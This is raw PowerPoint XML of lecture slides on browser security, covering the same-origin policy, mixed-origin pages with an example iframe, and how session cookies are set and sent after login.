        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1723965" y="3774593"/>
            <a:ext cx="840280" cy="548752"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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564245" y="5132295"/>
            <a:ext cx="1805940" cy="520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CSS Parser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757077" y="4323345"/>
            <a:ext cx="1420850" cy="520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JS Runtime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4177927" y="4570688"/>
            <a:ext cx="1613108" cy="8937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929859" y="4201356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JS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4370185" y="5420470"/>
            <a:ext cx="1420850" cy="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852915" y="5042201"/>
            <a:ext cx="524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CSS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678706" y="4034790"/>
            <a:ext cx="287" cy="288555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20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1703069" y="4889242"/>
            <a:ext cx="861177" cy="503251"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1704396" y="4583542"/>
            <a:ext cx="1052681" cy="899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Flowchart: Magnetic Disk 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495609" y="5691676"/>
            <a:ext cx="1003313" cy="88329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Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3384433" y="3767179"/>
            <a:ext cx="712150" cy="4483171"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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238370" y="5988417"/>
            <a:ext cx="92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Cookies</a:t>
            </a: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030" y="2122475"/>
            <a:ext cx="1005227" cy="1005227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9194338" y="3405920"/>
            <a:ext cx="1561147" cy="17870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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10981615" y="2914914"/>
            <a:ext cx="1071360" cy="94572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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="4299451"/>
            <a:ext cx="465070" cy="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/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729268" y="5420470"/>
            <a:ext cx="2267330" cy="242367"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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/>
          <p:cNvCxnSpPr>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10755485" y="4299451"/>
            <a:ext cx="763083" cy="841416"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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Elbow Connector 77"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10755485" y="3860638"/>
            <a:ext cx="761810" cy="438813"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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 flipV="1">
            <a:off x="3271892" y="4029971"/>
            <a:ext cx="5556" cy="287642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3771549" y="4843739"/>
            <a:ext cx="287" cy="288555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259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Mixing Origins, Revisited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4820" y="1690688"/>
            <a:ext cx="5985588" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;head&gt;&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>This is my page.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>password =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘s3cr3t’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US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‘http://google.com’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="187517" algn="l"/>
                <a:tab pos="375034" algn="l"/>
                <a:tab pos="562550" algn="l"/>
                <a:tab pos="750067" algn="l"/>
                <a:tab pos="937584" algn="l"/>
                <a:tab pos="1125101" algn="l"/>
                <a:tab pos="1312617" algn="l"/>
                <a:tab pos="1500134" algn="l"/>
                <a:tab pos="1687651" algn="l"/>
                <a:tab pos="1875168" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2250201" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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&lt;/html&gt;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270168" y="1690688"/>
            <a:ext cx="5674567" cy="4292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dirty="0"/>
              <a:t>This is my page.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591" y="2340011"/>
            <a:ext cx="5513849" cy="2659947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415212" y="4046388"/>
            <a:ext cx="5475514" cy="761988"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7462"/>
              <a:gd name="adj2" fmla="val -1444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Can JS from google.com read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>?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320350" y="5341717"/>
            <a:ext cx="5665237" cy="1132816"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62290"/>
              <a:gd name="adj2" fmla="val -578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Can JS in the main context do the following: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>’).cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0624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Securing the Browser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Browsers have become incredibly complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to open multiple pages at the same time (tabs and windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute arbitrary code (JavaScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store state from many origins (cookies, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the browser isolate code/data from different pages?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to interfere with any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One page shouldn’t be able to read private data stored by any others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional challenge: content may mix origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web pages may embed images and scripts from other domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basis for all classical web security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149581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B3B26-C289-47B1-9EF5-73DB69DA1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Same Origin Policy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A9C008-C63C-48CB-961D-ED841CE792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Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP is the basis of classic web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some exceptions to this policy (unfortunately)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP has been relaxed over time to make controlled sharing easier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441718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0EA11-81F0-4CE0-BAFA-870378025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Same Origin Policy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A4E2D8-021E-4D52-831A-0E71FE948A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Origin = &lt;protocol, hostname, port&gt;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The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin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449984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F1A03-121F-4B05-8112-A19D3893F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Cookies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99D47-E669-469C-B7DE-454A7A0434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Introduced in 1994, cookies are a basic mechanism for persistent state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows services to store a small amount of data at the client (usually ~4K)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used for identification, authentication, user tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain and path restricts resources browser will send cookies to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiration sets how long cookie is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional security restrictions (added much later): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulated by Set-Cookie and Cookie headers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1170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Cookie Example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170" y="2275749"/>
            <a:ext cx="893446" cy="8934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0050" y="1514143"/>
            <a:ext cx="3249370" cy="461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Client Side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64" y="2236697"/>
            <a:ext cx="971550" cy="9715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24967" y="1514935"/>
            <a:ext cx="3769853" cy="4608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Server Side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919579" y="2016821"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074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4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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4781724" y="3387776"/>
              <a:ext cx="32004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GET /login_form.html HTTP/1.1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919579" y="2503294"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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5477844" y="3387776"/>
              <a:ext cx="18081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HTTP/1.1 200 OK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919579" y="3176572"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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4945584" y="3387776"/>
              <a:ext cx="28727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POST /cgi/login.sh HTTP/1.1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919579" y="3700096"/>
            <a:ext cx="3859415" cy="709300"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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4536569" y="3387776"/>
              <a:ext cx="3690754" cy="3524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HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Set-Cookie: session=FhizeVYSkS7X2K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919579" y="6020986"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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4691254" y="3469443"/>
              <a:ext cx="3381374" cy="2792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GET /my_files.html HTTP/1.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;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35B6BEB-5BD0-4093-9839-1A61DEF05D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="5433289"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817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9A88B3F5-9C3B-4540-B8FB-291C98C62367}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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5959F42-1FB7-4A4D-AEF8-4A1725C686E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477844" y="3387776"/>
              <a:ext cx="18081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HTTP/1.1 200 OK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5CCDCED-EEA0-4ADB-AC1E-FF2F7AEF3810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="4645868"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr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D4AE87FB-6664-4C64-A51D-4F9556C8781F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="571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AACB08A-ACFB-42C6-BDD5-18B11EA6645B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4691254" y="3469443"/>
              <a:ext cx="3381374" cy="2792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GET /private_data.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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1A445283-2838-4C8B-84DB-4B10E7EF8C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310185" y="3700096"/>
            <a:ext cx="1846997" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 91482"/>
              <a:gd name="adj2" fmla="val 244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Store the cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Speech Bubble: Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963B6A5F-309B-4C86-BB14-671F240FCCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609619" y="3361238"/>
            <a:ext cx="3236638" cy="1333588"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74588"/>
              <a:gd name="adj2" fmla="val -1942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If credentials are correct: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Generate a random token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Store token in the database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Send token to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Speech Bubble: Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9497A3-E84E-466E-B4D4-AD4A88ED23D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261445" y="5019899"/>
            <a:ext cx="3584812" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68624"/>
              <a:gd name="adj2" fmla="val -38014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Check token in the database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If it exists, user is authenticated </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390132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8" grpId="0" animBg="1"/>
      <p:bldP spid="3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State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Each origin may set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects from embedded resources may also set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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lang="en-US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“http://www.images.com/cats/adorablekitten.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt;&lt;/img&gt;</a:t>
            </a:r>
